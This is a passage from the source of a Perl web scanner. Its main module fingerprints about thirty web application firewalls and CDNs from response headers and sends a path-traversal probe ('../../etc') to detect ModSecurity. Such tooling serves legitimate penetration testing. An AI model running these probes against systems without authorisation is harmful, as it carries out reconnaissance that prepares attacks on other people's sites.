18 | 	fprint("robots.txt is not found");
19 | }
20 | #end robots.txt module


--------------------------------------------------------------------------------
/modules/waf_detector.pl:
--------------------------------------------------------------------------------
  1 | #start WAF Detector
  2 | $fwtf=0;
  3 | $source=$ua->get("$target/")->headers_as_string;
  4 | dprint("FireWall Detector");
  5 | if ($source =~ /cloudflare-nginx/g or $source =~ /CF-Chl-Bypass/g or $source =~ /Server\: cloudflare/g or $source =~ /__cfduid/g ) {
  6 | 	tprint("Firewall detected : CloudFlare");
  7 | 	$fwtf=1;
  8 | }elsif ($source =~ /incapsula/g or $source =~ /incap_ses/g or $source =~ /visid_incap/g or $source =~ /visid_incap/g) {
  9 | 	tprint("Firewall detected : Incapsula");
 10 | 	$fwtf=1;
 11 | }elsif ($source =~ /ShieldfyWebShield/g) {
 12 | 	tprint("Firewall detected : Shieldfy");
 13 | 	$fwtf=1;
 14 | }elsif ($source =~ /X\-Sucuri\-ID/g) {
 15 | 	tprint('Firewall detected : Sucuri Firewall (Sucuri Cloudproxy)');
 16 | 	$fwtf=1;
 17 | }elsif ($source =~ /X\-Powered\-By\-Anquanbao/g) {
 18 | 	tprint('Firewall detected : Anquanbao');
 19 | 	$fwtf=1;
 20 | }elsif ($source =~ /barra_counter_session/g or $source =~ /BNI__BARRACUDA_LB_COOKIE/g or $source =~ /BNI_persistence/g) {
 21 | 	tprint('Firewall detected : Barracuda Application Firewall');
 22 | 	$fwtf=1;
 23 | }elsif ($source =~ /BinarySec/g or $source =~ /x-binarysec-via/g or $source =~ /x-binarysec-nocache/g) {
 24 | 	tprint('Firewall detected : BinarySec');
 25 | 	$fwtf=1;
 26 | }elsif ($source =~ /BlockDos\.net/g) {
 27 | 	tprint('Firewall detected : BlockDoS');
 28 | 	$fwtf=1;
 29 | }elsif ($source =~ /Powered\-By\-ChinaCache/g) {
 30 | 	tprint('Firewall detected : ChinaCache-CDN');
 31 | 	$fwtf=1;
 32 | }elsif ($source =~ /ACE XML Gateway/g) {
 33 | 	tprint('Firewall detected : Cisco ACE XML Gateway');
 34 | 	$fwtf=1;
 35 | }elsif ($source =~ /Protected by COMODO WAF/g) {
 36 | 	tprint('Firewall detected : Comodo WAF');
 37 | 	$fwtf=1;
 38 | }elsif ($source =~ /X\-dotDefender\-denied/g) {
 39 | 	tprint('Firewall detected : Applicure dotDefender');
 40 | 	$fwtf=1;
 41 | }elsif ($source =~ /BigIP|BIG-IP|BIGIP/g or $source =~ /LastMRH_Session/g or $source =~ /MRHSequence/g) {
 42 | 	tprint('Firewall detected : F5 BIG-IP APM');
 43 | 	$fwtf=1;
 44 | }elsif ($source =~ /F5\-TrafficShield/g) {
 45 | 	tprint('Firewall detected : F5 Trafficshield');
 46 | 	$fwtf=1;
 47 | }elsif ($source =~ /FORTIWAFSID/g) {
 48 | 	tprint('Firewall detected : FortiWeb');
 49 | 	$fwtf=1;
 50 | }elsif ($source =~ /Mission Control Application Shield/g) {
 51 | 	tprint('Firewall detected : Mission Control Application Shield');
 52 | 	$fwtf=1;
 53 | }elsif ($source =~ /naxsi/g) {
 54 | 	tprint('Firewall detected : Naxsi');
 55 | 	$fwtf=1;
 56 | }elsif ($source =~ /NCI\_\_SessionId/g) {
 57 | 	tprint('Firewall detected : NetContinuum');
 58 | 	$fwtf=1;
 59 | }elsif ($source =~ /pwcount/g or $source =~ /ns\_af/g or $source =~ /citrix\_ns\_id/g  or $source =~ /NSC\_/g ) {
 60 | 	tprint('Firewall detected : Citrix NetScaler');
 61 | 	$fwtf=1;
 62 | }elsif ($source =~ /NSFocus/g ) {
 63 | 	tprint('Firewall detected : NSFocus');
 64 | 	$fwtf=1;
 65 | }elsif ($source =~ /PowerCDN/g ) {
 66 | 	tprint('Firewall detected : PowerCDN');
 67 | 	$fwtf=1;
 68 | }elsif ($source =~ /profense/g ) {
 69 | 	tprint('Firewall detected : Profense');
 70 | 	$fwtf=1;
 71 | }elsif ($source =~ /X\-SL\-CompState/g ) {
 72 | 	tprint('Firewall detected : Radware AppWall');
 73 | 	$fwtf=1;
 74 | }elsif ($source =~ /Safedog/g or $source =~ /safedog/g ) {
 75 | 	tprint('Firewall detected : Safedog');
 76 | 	$fwtf=1;
 77 | }elsif ($source =~ /st8id/g) {
 78 | 	tprint('Firewall detected : Teros WAF');
 79 | 	$fwtf=1;
 80 | }elsif ($source =~ /Secure Entry Server/g) {
 81 | 	tprint('Firewall detected : USP Secure Entry Server');
 82 | 	$fwtf=1;
 83 | }elsif ($source =~ /nginx-wallarm/g) {
 84 | 	tprint('Firewall detected : Wallarm');
 85 | 	$fwtf=1;
 86 | }elsif ($source =~ /WT263CDN/g) {
 87 | 	tprint('Firewall detected : West263CDN');
 88 | 	$fwtf=1;
 89 | }elsif ($source =~ /X-Powered-By-360WZB/g) {
 90 | 	tprint('Firewall detected : 360WangZhanBao');
 91 | 	$fwtf=1;
 92 | }
 93 | 
 94 | 
 95 | $source=$ua->get("$target/../../etc")->headers_as_string;
 96 | if ($source =~ /mod_security/g or $source =~ /Mod_Security/g or $source =~ /NOYB/g) {
 97 | 	tprint("Firewall detected : Mod_Security");
 98 | 	$fwtf=1;
 99 | }
100 | if ($fwtf==0){
101 | 	fprint("Firewall not detected");
102 | }
103 | #end WAF Detector


--------------------------------------------------------------------------------
/reports/hello.txt:
--------------------------------------------------------------------------------
1 | Hello World !


--------------------------------------------------------------------------------
/version:
--------------------------------------------------------------------------------
1 | 0.0.7
2 | 


--------------------------------------------------------------------------------